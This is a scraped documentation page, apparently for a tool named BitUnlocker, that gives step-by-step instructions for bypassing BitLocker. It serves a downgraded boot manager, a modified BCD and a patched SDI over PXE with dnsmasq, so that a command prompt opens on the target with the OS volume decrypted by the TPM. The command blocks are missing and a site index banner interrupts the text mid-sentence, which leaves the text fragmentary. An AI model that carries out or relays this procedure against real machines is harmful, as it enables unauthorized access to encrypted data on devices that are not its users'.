The PXE delivery method uses a Linux machine connected to the target via Ethernet to serve the pre-patchDocumentation Index
Fetch the complete documentation index at: https://mintlify.com/garatc/BitUnlocker/llms.txt
Use this file to discover all available pages before exploring further.
bootmgfw.efi and boot_patched.sdi over TFTP. This approach takes several minutes for the SDI file to transfer, but it is valuable when USB ports are physically locked or disabled in firmware. The repository’s TFTP-root/ directory already contains the pre-patch bootmgfw.efi in the correct layout — you only need to add the modified BCD and boot_patched.sdi, then start dnsmasq.
TFTP-root Layout
After completing the Prepare SDI and Modify BCD steps, yourTFTP-root/ directory should look like this:
bootmgfw.efi in the appropriate locations within TFTP-root/. Place the BCD file you produced in Modify BCD at TFTP-root/Boot/BCD, and place boot_patched.sdi at TFTP-root/sdi/boot_patched.sdi.
Start the PXE Server
Connect the target machine to your Linux machine using an Ethernet cable, then run the following commands to assign a static IP to the interface and startdnsmasq as a combined DHCP and TFTP server:
<your-interface> with the name of your Ethernet interface (e.g. eth0, enp3s0). Run ip link to list available interfaces if you are unsure.
Trigger PXE Boot on the Target
Boot the target into network boot mode using one of these methods:- From WinRE: In the recovery menu, choose Use a device → IPv4 Network.
- At power-on: Press the manufacturer’s PXE boot key as the machine starts (commonly F12 or a dedicated network boot option in the UEFI boot menu).
Wait for the SDI Transfer
Once the target boots, the pre-patchbootmgfw.efi is delivered via TFTP, after which the boot manager reads the BCD and begins downloading boot_patched.sdi. Because the file is approximately 300 MB, the transfer over a direct Ethernet link typically takes several minutes. A recovery-related message showing the SDI path will appear on the target’s screen while the download is in progress.
Access the Decrypted Volume
Once the SDI finishes loading, a command prompt appears on the target. The TPM will have already unsealed the BitLocker volume master key, so the OS volume is decrypted and should be mounted automatically — typically asC: or E:.
If the volume is not mounted automatically, use diskpart to assign it a letter:
X with the volume number that corresponds to the encrypted OS partition (identified by its size in the diskpart listing).